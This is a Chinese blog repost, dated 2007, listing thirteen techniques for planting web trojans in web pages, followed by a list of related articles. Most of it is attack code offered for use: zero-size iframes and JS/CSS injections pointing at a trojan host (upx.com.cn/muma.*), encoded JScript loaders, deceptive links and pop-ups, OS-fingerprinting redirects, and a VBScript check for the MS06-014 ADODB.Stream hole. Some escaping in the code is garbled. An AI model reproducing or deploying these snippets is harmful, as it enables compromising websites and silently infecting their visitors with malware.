目前比较常用的挂马代码

转载 2007年09月25日 10:40:00

一:框架挂马  
<iframe src=地址 width=0 height=0></iframe>  
 
二:js文件挂马  
首先将以下代码  
document.write("<iframe width='0' height='0' src='地址'></iframe>");  
保存为xxx.js,  
则JS挂马代码为  
<script language=javascript src=xxx.js></script>  
 
三:js变形加密  
<SCRIPT language="JScript.Encode" src=http://www.upx.com.cn/muma.txt></script>  
muma.txt可改成任意后缀  
 
四:body挂马  
<body onload="window.location='地址';"></body>  
 
五:隐蔽挂马  
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://www.upx.com.cn/muma.htm/"></iframe>';  
 
六:css中挂马  
body {  
background-image: url('javascript:document.write("<script src=http://www.upx.com.cn/muma.js></script>")')}  
 
七:JAJA挂马  
<SCRIPT language=javascript>  
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");  
</script>  
 
八:图片伪装  
<html>  
<iframe src="网马地址" height=0 width=0></iframe>  
<img src="图片地址"></center>  
</html>  
 
九:伪装调用:  
<frameset rows="444,0" cols="*">  
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">  
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">  
</frameset>  
 
十:高级欺骗  
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>  
<SCRIPT Language="JavaScript">  
function www_163_com ()  
{  
var url="网马地址";  
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");  
}  
</SCRIPT>  
 
十一:判断系统代码  
 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD><TITLE>404</TITLE>  
<META http-equiv=Content-Type content="text/html; charset=windows-1252">  
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>  
<BODY>  
<SCRIPT language=javascript>  
window.status="";  
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)  
window.location.href="tk.htm";  
else  
window.location.href="upx06014.htm";  
</SCRIPT>  
</BODY></HTML>  
 
十二:判断是否有ms06014代码  
 
<script language=VBScript>  
on error resume next  
set server = document.createElement("object")  
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"  
set File = server.createobject(Adodb.Stream,"")  
if Not Err.Number = 0 then  
err.clear  
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")  
else  
document.write ("<iframe src=http://upx.com.cn width=100% height=100% scrolling=no frameborder=0>")  
end if  
</script>  
 
十三:智能读取js的代码demo  
 
//读娶src的对象  
var v = document.getElementById("advjs");  
//读娶src的参数  
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));  
 
document.write("<iframe src=/"http://www.upx.com.cn/1/"+u_num+".htm/" width=/"0/" height=/"0/" frameborder=/"0/"></iframe>");  
document.writeln("<!DOCTYPE HTML PUBLIC /"-////W3C////DTD HTML 4.0 Transitional////EN/">");  
document.writeln("<HTML><HEAD>");  
document.writeln("<META http-equiv=Content-Type content=/"text//html; charset=big5/">");  
document.writeln("<META content=/"MSHTML 6.00.2900.3059/" name=GENERATOR><//HEAD>");  
document.writeln("<BODY> ");  
document.writeln("<DIV style=/"CURSOR: url(/'http:////www.upx.com.cn//demo.js/')/">");  
document.writeln("<DIV ");  
document.writeln("style=/"CURSOR: url(/'http:////www.upx.com.cn//demo.js/')/"><//DIV><//DIV><//BODY><//HTML>")  
 
//分析src的参数函数  
function getUrlParameterAdv(asName,lsURL){  
 
loU = lsURL.split("?");  
if (loU.length>1){  
 
var loallPm = loU[1].split("&");  
 
for (var i=0; i<loallPm.length; i++){  
var loPm = loallPm.split("=");  
if (loPm[0]==asName){  
if (loPm.length>1){  
return loPm[1];  
}else{  
return "";  
}  
}  
}  
}  
return null;  
}   

相关文章推荐

最新挂马代码,第一个先报!

最新挂马代码,第一个先报! 我的站www.xzbaojia.com  www.yzbaojia.com  全被挂马了,代码如下:网站被挂马,大量的马,, 所有的网页全被挂了,无一漏网,但特点跟...

挂马代码大全

  • 2012-08-09 23:21
  • 16KB
  • 下载

VBS清除全盘网页文件被挂马代码【VBS专杀】

由于有些病毒很恶心的感染了全盘文件, 感染exe还不说,还感染网页文件,真的极度变态恶心啊!杀毒软件清除exe文件还好,但是网页文件会被直接删除掉,好吧,自己动手,丰衣足食。用vbs写了这个脚本。 ...

MSSQL数据库被插入JS/sql注入挂马的解决方法

MSSQL数据库被插入JS/sql注入挂马的解决方法黑客先从搜索引擎google、百度等搜索存在漏洞的采用asp+mssql设计的网站,然后采用小明子这样的注入扫描工具,扫描整个网站,一旦发现有sql...

挂马攻击的介绍和防御

0x01 介绍         挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞...

正确设置php-fpm子进程用户,提高网站安全性防挂马

原文地址:http://www.myhack58.com/Article/60/61/2013/37209.htm 根据生产环境不断反馈,发现不断有 PHP网站被挂木马,绝大部分原因是因为权限...

网站挂马原理方法

挂马代码大全一:框架挂马二:js文件挂马首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为<b

剖析ActiveX挂马:以安装名义入侵

曾几何时, 利用ActiveX是流氓软件“行凶”的主要技术手段之一,如今流氓软件大多都已经作古了,可ActiveX并没有退出人们的视野,网页挂马看上了它,于是ActiveX挂马流行起来,成为了重要的几...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)